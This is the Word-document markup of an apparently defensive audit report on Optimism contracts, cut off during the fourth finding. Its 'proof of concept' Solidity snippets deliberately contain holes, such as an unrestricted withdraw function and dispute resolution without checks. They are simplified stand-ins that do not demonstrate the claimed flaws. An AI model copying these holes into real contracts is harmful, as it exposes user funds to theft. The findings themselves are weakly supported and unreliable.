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1. Introduction</w:t>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By: Amber Buchtela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This report details a series of security vulnerabilities discovered in the Optimism ecosystem. The findings were identified through static analysis and testing using tools such as Hardhat for vulnerability simulation. This report contains multiple critical, high, medium, and low-severity vulnerabilities, including reentrancy issues, incorrect dispute resolutions, loss of user funds, and permanent freezing of funds.</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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vulnerabilities identified</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 1: Incorrectly Resolved Dispute Game</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Contract: CrossL2Inbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability allows a dispute game to be incorrectly resolved when specific conditions aren’t validated before dispute finalization. Without proper delay mechanisms or verification checks, the dispute game resolution can be manipulated. Static analysis flagged this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This could lead to wrongful dispute resolutions, potentially allowing attackers to win or lose disputes unfairly.</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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (PoC):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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SPDX-License-Identifier: MIT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pragma solidity 0.8.15;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contract CrossL2Inbox {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    mapping(bytes32 =&gt; bool) public initiatedMessages;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event MessageInitiated(bytes32 indexed messageHash, address sender, address target);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function verifyMessage(</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        address _sender,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        address _target,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        bytes calldata _message,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        uint256 _nonce</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    ) internal view returns (bool) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        bytes32 messageHash = keccak256(</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">            abi.encodePacked(_sender, _target, _message, _nonce)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return initiatedMessages[messageHash];</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function resolveDispute(bytes32 _messageHash) public {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Vulnerable logic: Dispute resolution without sufficient checks</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        require(!initiatedMessages[_messageHash], "Dispute already resolved");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        initiatedMessages[_messageHash] = true;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Dispute resolution logic...</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Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add additional verification checks and a timelock mechanism to the dispute resolution function to prevent early resolution and manipulation.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 2: Loss of User Funds by Direct Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Contract: CrossL2Inbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker can steal user funds due to a lack of proper access control and validation checks in the contract. Without reentrancy guards or validation, fund transfers can be hijacked by an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This would allow attackers to directly withdraw funds from the contract, resulting in potential loss of user funds.</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Proof of Concept (PoC):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="240" w:befor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CrossL2Inbox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mapping(bytes32 =&gt; bool) public initiatedMessages;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event MessageInitiated(bytes32 indexed messageHash, address sender, address target);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verifyMessage(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address _sender,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address _target,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bytes calldata _message,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uint256 _nonce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internal view returns (bool)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bytes32 messageHash = keccak256(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abi.encodePacked(_sender, _target, _message, _nonce)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initiatedMessages[messageHash];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Vulnerability: No access control or reentrancy guard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withdraw(address _to, uint256 _amount) external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payable(_to).transfer(_amount);  // Direct theft vulnerability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B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement access controls, validation checks, and reentrancy guards to prevent unauthorized fund transfers.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 3: Incorrectly Resolved Dispute Game (with specific conditions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Contract: FaultDisputeGame</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability allows the dispute game to be incorrectly resolved when the function step() is called on a claim at MAX_GAME_DEPTH. It can also occur when attack() or defend() are called at MAX_GAME_DEPTH-2, resulting in improper dispute resolutions. Static analysis identified the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This flaw could cause disputes to be resolved incorrectly under specific conditions, leading to unfair game outcomes.</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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (PoC):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>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FaultDisputeGame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uint256 public constant MAX_GAME_DEPTH = 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step(uint256 _gameDepth) external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require(_gameDepth &lt; MAX_GAME_DEPTH, "Invalid game depth");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Vulnerability: No checks at MAX_GAME_DEPTH or MAX_GAME_DEPTH-2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attack(uint256 _gameDepth) external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require(_gameDepth &lt; MAX_GAME_DEPTH, "Invalid attack depth");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Vulnerability: No checks at MAX_GAME_DEPTH-2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defend(uint256 _gameDepth) external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require(_gameDepth &lt; MAX_GAME_DEPTH, "Invalid defend depth");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Vulnerability: No checks at MAX_GAME_DEPTH-2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E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add safety checks specifically for operations near MAX_GAME_DEPTH and implement proper validation for the step, attack, and defend functions.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 4: Permanent Freezing of Funds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Contract: OptimismPortal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
